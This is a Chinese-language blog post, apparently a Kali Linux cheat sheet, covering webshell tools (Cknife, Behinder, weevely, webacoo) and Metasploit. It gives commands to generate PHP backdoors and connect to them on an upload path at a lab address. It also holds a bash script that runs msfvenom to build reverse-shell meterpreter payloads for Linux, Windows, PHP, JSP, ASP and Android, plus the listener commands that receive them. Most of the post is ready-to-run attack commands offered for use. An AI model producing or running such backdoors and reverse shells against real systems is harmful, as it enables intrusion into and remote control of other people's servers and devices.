1 Cknife
- 一款 webshell 连接工具,项目地址:https://github.com/Chora10/Cknife
- 工具启动:
/usr/lib/jvm/jdk1.8.0_281/bin/java -jar Cknife.jar &
- 工具的使用:
- 常见的一句话后门样例:
2 Behinder_v3.0
- 工具启动:
/usr/lib/jvm/jdk1.8.0_281/bin/java -jar Behinder.jar
3 behinder_v4.0.5
- 使用前先生成 webshell
随后上传后,使用对应的协议连接即可。
4 /usr/share/webshells
- 在 kali 的 /usr/share/webshells 目录中,同样内置了一些 webshell 可供使用。
5 weevely
- Weevely 是一款使用 python 编写的 webshell 工具,集 webshell 生成和连接于一身,采用 c/s 模式构建,可以算作是 linux 下的一款 php 菜刀替代工具,具有很好的隐蔽性。
weevely generate 12345 /root/fsec.php
weevely http://192.168.0.104/hackable/uploads/fsec.php 12345
6 webacoo
- webacoo 是使用 Perl 语言编写的 Web 后门工具。
Options:
-g Generate backdoor code (-o is required)
-f FUNCTION PHP System function to use
FUNCTION
1: system (default)
2: shell_exec
3: exec
4: passthru
5: popen
-o OUTPUT Generated backdoor output filename
-r Return un-obfuscated backdoor code
-t Establish remote "terminal" connection (-u is required)
-u URL Backdoor URL
-e CMD Single command execution mode (-t and -u are required)
-m METHOD HTTP method to be used (default is GET)
-c C_NAME Cookie name (default: "M-cookie")
-d DELIM Delimiter (default: New random for each request)
-a AGENT HTTP header user-agent (default exist)
-p PROXY Use proxy (tor, ip:port or user:pass:ip:port)
-v LEVEL Verbose level
LEVEL
0: no additional info (default)
1: print HTTP headers
2: print HTTP headers + data
-l LOG Log activity to file
-h Display help and exit
update Check for updates and apply if any
webacoo -g -f 1 -o webacoo.php
webacoo -t -u http://192.168.0.104/hackable/uploads/webacoo.php
7 metasploit
- 将如下脚本复制于 kaili 中,运行后即可创建多类型的脚本。
#!/bin/bash
echo "pls input your IP ADDRESS"
read ip
rm -rf shell*
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$ip LPORT=4444 -f elf > shell.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$ip LPORT=4444 -f elf > shell64.elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=4444 -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ip LPORT=4444 -f exe > shell64.exe
msfvenom -p php/meterpreter/reverse_tcp LHOST=$ip LPORT=80 -f raw >shell.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=4444 -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ip LPORT=4444 -f raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ip LPORT=4444 -f war > shell.war
msfvenom -p cmd/unix/reverse_bash LHOST=$ip LPORT=4444 -f raw > shell.sh
msfvenom -p android/meterpreter/reverse_tcp LHOST=$ip LPORT=4444 R > shell.apk
- PHP 的 shell 需要编辑下去除注释才能使用。
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 80
exploit
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容